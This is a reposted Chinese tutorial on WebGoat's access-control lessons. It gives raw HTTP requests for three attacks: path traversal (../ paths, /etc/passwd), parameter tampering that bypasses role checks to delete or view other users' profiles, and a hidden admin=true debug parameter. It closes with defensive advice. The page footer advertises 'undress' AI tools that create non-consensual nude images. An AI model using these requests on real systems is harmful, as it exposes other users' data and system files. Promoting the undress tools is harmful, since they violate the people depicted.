search
HomeDatabaseMysql TutorialWebGoat学习访问控制缺陷( Access Control Flaws)

在一个基于角色的 访问 控制 方案中,角色代表了一组 访问 权限和特权。一个用户可以被分配一个或多个角色。一个基于角色的 访问 控制 方案通常有两个部分组成:角色权限管理和角色分配。一个被破坏的基于角色的 访问 控制 方案可能允许用户执行不允许他/她

  在一个基于角色的访问控制方案中,角色代表了一组访问权限和特权。一个用户可以被分配一个或多个角色。一个基于角色的访问控制方案通常有两个部分组成:角色权限管理和角色分配。一个被破坏的基于角色的访问控制方案可能允许用户执行不允许他/她的被分配的角色,或以某种方式允许特权升级到未经授权的角色的访问

1. 绕过基于路径的访问控制方案

  在一个基于路径的访问控制方案中,攻击者可以通过提供相对路径信息遍历路径。因此,攻击者可以使用相对路径访问那些通常任何人都不能直接访问或直接请求就会被拒绝的文件。

  例如在一个基于权限的卖家管理系统,每个卖家只能操作自己的订单信息和商品信息,现在有卖家A和卖家B。A的商品信息被放在/webapps/A/下,例如/webapps/A/item1.html。A可以通过商品列表接口访问自己的商品信息,服务器验证A的身份后将A目录下的商品列表返回给客户端。A浏览自己商品时会向服务器发送访问请求,请求如下:

POST http://localhost:8080/WebGoat/attack?Screen=57&menu=200 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/WebGoat/attack?Screen=57&menu=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DC

File=item1.html&SUBMIT=View+File

  服务器收到请求后在A的目录下获取到item1.html并将结果返回给客户端。比较粗心的程序员在获取商品详情时没有再次校验卖家对目录的权限访问,黑客可意利用这个疏忽通过修改参数来欺骗服务器。例如修改请求参数如下:

POST http://localhost:8080/WebGoat/attack?Screen=57&menu=200 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/WebGoat/attack?Screen=57&menu=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DC

File=../B/xxx.html&SUBMIT=View+File

  服务器收到请求后,验证A用户是登陆的,然后将根目录设置为/webapps/A/访问../B/xxx.html,实际访问到了卖家B的商品信息/webapps/B/xxx.html,从而将B的商品详情(包括成本价信息)泄露给了A卖家。更为脆弱的系统可能会造成重要信息的泄露,例如将请求中File的参数设置成/etc/passwd或者/etc/passwd,则可能会获取到系统用户的信息,造成更为严重的损失。

2.基于角色的访问控制

  很多网站都尝试使用基于角色的方式严格限制资源访问,但开发人员在实现这类解决方案时容易出现疏忽。例如对于资源S,Tom和John均具有访问权限,John相对于Tom可以修改和删除资源S。客户Tom登录系统后服务器返回Tom的访问权限,并返回只有view按钮的html页面:

WebGoat学习访问控制缺陷( Access Control Flaws)

  Jone登录系统后服务器返回带有view和delete的html页面:

WebGoat学习访问控制缺陷( Access Control Flaws)

  点击delete操作,客户端向服务器发送如下请求:

POST http://localhost:8080/WebGoat/attack?Screen=65&menu=200 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/WebGoat/attack?Screen=65&menu=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DC

employee_id=105&action=DeleteProfile 

  服务器受到上述请求后,执行了delete操作。tom在view资源S时会向服务器发送如下请求:

POST http://localhost:8080/WebGoat/attack?Screen=65&menu=200 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 34
Cache-Control: max-age=0
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/WebGoat/attack?Screen=65&menu=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FB890B2A9D89628CF57454C6700CE7DC

employee_id=105&action=ViewProfile  

  tom知道上述信息后可以尝试把自己的post参数做下修改,将post的参数串修改为employee_id=105&action=DeleteProfile发送给服务器。粗心的程序员因为疏忽没有再次校验tom的权限,导致tom成功执行了john的delete权限。同样的方法tom通过修改url执行系统管理员admin的操作,对服务器造成威胁。

  在通过view请求tom可以查看相关资料的详细信息。

WebGoat学习访问控制缺陷( Access Control Flaws)

  从上面请求参数中可以看出资料的idemployee_id表示,如果尝试修改employee_id=101重新发送请求,则会收到服务器的答复如下:

WebGoat学习访问控制缺陷( Access Control Flaws)

  成功的绕过展现层的限制访问到了Larry的资料。

  要预防上述操作服务器端服务务必要加强请求参数的过滤校验,以及权限的验证,每个请求都不要信任之前所做的操作,要不信任所有外部输入的参数,加强校验,尤其是对比较敏感的操作比如支付、删除、改价操作。如果多个接口共同对外提供服务,我们可以通过展示层的包装和内部跳转逻辑使整个流程处在一个理想的环境,但是只要各个接口独立就会被黑客所利用制造不合理的请求;因此系统在设计的时候不要仅仅考虑正常的情况是什么样,还要考虑异常(人为)情况的处理,务必要在每个环节做好严格的参数校验和权限校验,坚持不信任原则。

3. 远程管理访问

  很多网站开发人员在脚本中预留了相关的参数接口,一旦该参数被后台程序确认,则访问者的权限会被放大,浏览到先前不能访问的资源,如:程序调试日志、隐藏功能菜单等。例如某接口想设置一个admin=true的参数使开发人员可以在任何地方打开调试信息或者后台数据用于调试。例如http://localhost:8080/WebGoat/attack?Screen=28&menu=2000页面只会展示用户自身的身份信息,如果开发人员喜欢进行一些调试修改URL为:http://localhost:8080/WebGoat/attack?Screen=28&menu=2000&admin=true,服务器返回所有用户的详细资料,方便了外网的调试。

 WebGoat学习访问控制缺陷( Access Control Flaws)

  外网调试固然方便,但方便自己的同时也方便了不法人员,互联网上是没有秘密的,一旦密码被别人获取,就可以由此攻击对应的服务,造成不必要的损失,在实际操作时,一定要保证外网的服务关闭相应的调试功能。

Statement
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Explain the InnoDB Buffer Pool and its importance for performance.Explain the InnoDB Buffer Pool and its importance for performance.Apr 19, 2025 am 12:24 AM

InnoDBBufferPool reduces disk I/O by caching data and indexing pages, improving database performance. Its working principle includes: 1. Data reading: Read data from BufferPool; 2. Data writing: After modifying the data, write to BufferPool and refresh it to disk regularly; 3. Cache management: Use the LRU algorithm to manage cache pages; 4. Reading mechanism: Load adjacent data pages in advance. By sizing the BufferPool and using multiple instances, database performance can be optimized.

MySQL vs. Other Programming Languages: A ComparisonMySQL vs. Other Programming Languages: A ComparisonApr 19, 2025 am 12:22 AM

Compared with other programming languages, MySQL is mainly used to store and manage data, while other languages ​​such as Python, Java, and C are used for logical processing and application development. MySQL is known for its high performance, scalability and cross-platform support, suitable for data management needs, while other languages ​​have advantages in their respective fields such as data analytics, enterprise applications, and system programming.

Learning MySQL: A Step-by-Step Guide for New UsersLearning MySQL: A Step-by-Step Guide for New UsersApr 19, 2025 am 12:19 AM

MySQL is worth learning because it is a powerful open source database management system suitable for data storage, management and analysis. 1) MySQL is a relational database that uses SQL to operate data and is suitable for structured data management. 2) The SQL language is the key to interacting with MySQL and supports CRUD operations. 3) The working principle of MySQL includes client/server architecture, storage engine and query optimizer. 4) Basic usage includes creating databases and tables, and advanced usage involves joining tables using JOIN. 5) Common errors include syntax errors and permission issues, and debugging skills include checking syntax and using EXPLAIN commands. 6) Performance optimization involves the use of indexes, optimization of SQL statements and regular maintenance of databases.

MySQL: Essential Skills for Beginners to MasterMySQL: Essential Skills for Beginners to MasterApr 18, 2025 am 12:24 AM

MySQL is suitable for beginners to learn database skills. 1. Install MySQL server and client tools. 2. Understand basic SQL queries, such as SELECT. 3. Master data operations: create tables, insert, update, and delete data. 4. Learn advanced skills: subquery and window functions. 5. Debugging and optimization: Check syntax, use indexes, avoid SELECT*, and use LIMIT.

MySQL: Structured Data and Relational DatabasesMySQL: Structured Data and Relational DatabasesApr 18, 2025 am 12:22 AM

MySQL efficiently manages structured data through table structure and SQL query, and implements inter-table relationships through foreign keys. 1. Define the data format and type when creating a table. 2. Use foreign keys to establish relationships between tables. 3. Improve performance through indexing and query optimization. 4. Regularly backup and monitor databases to ensure data security and performance optimization.

MySQL: Key Features and Capabilities ExplainedMySQL: Key Features and Capabilities ExplainedApr 18, 2025 am 12:17 AM

MySQL is an open source relational database management system that is widely used in Web development. Its key features include: 1. Supports multiple storage engines, such as InnoDB and MyISAM, suitable for different scenarios; 2. Provides master-slave replication functions to facilitate load balancing and data backup; 3. Improve query efficiency through query optimization and index use.

The Purpose of SQL: Interacting with MySQL DatabasesThe Purpose of SQL: Interacting with MySQL DatabasesApr 18, 2025 am 12:12 AM

SQL is used to interact with MySQL database to realize data addition, deletion, modification, inspection and database design. 1) SQL performs data operations through SELECT, INSERT, UPDATE, DELETE statements; 2) Use CREATE, ALTER, DROP statements for database design and management; 3) Complex queries and data analysis are implemented through SQL to improve business decision-making efficiency.

MySQL for Beginners: Getting Started with Database ManagementMySQL for Beginners: Getting Started with Database ManagementApr 18, 2025 am 12:10 AM

The basic operations of MySQL include creating databases, tables, and using SQL to perform CRUD operations on data. 1. Create a database: CREATEDATABASEmy_first_db; 2. Create a table: CREATETABLEbooks(idINTAUTO_INCREMENTPRIMARYKEY, titleVARCHAR(100)NOTNULL, authorVARCHAR(100)NOTNULL, published_yearINT); 3. Insert data: INSERTINTObooks(title, author, published_year)VA

See all articles

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

MantisBT

MantisBT

Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.

Dreamweaver Mac version

Dreamweaver Mac version

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

PhpStorm Mac version

PhpStorm Mac version

The latest (2018.2.1) professional PHP integrated development tool

WebStorm Mac version

WebStorm Mac version

Useful JavaScript development tools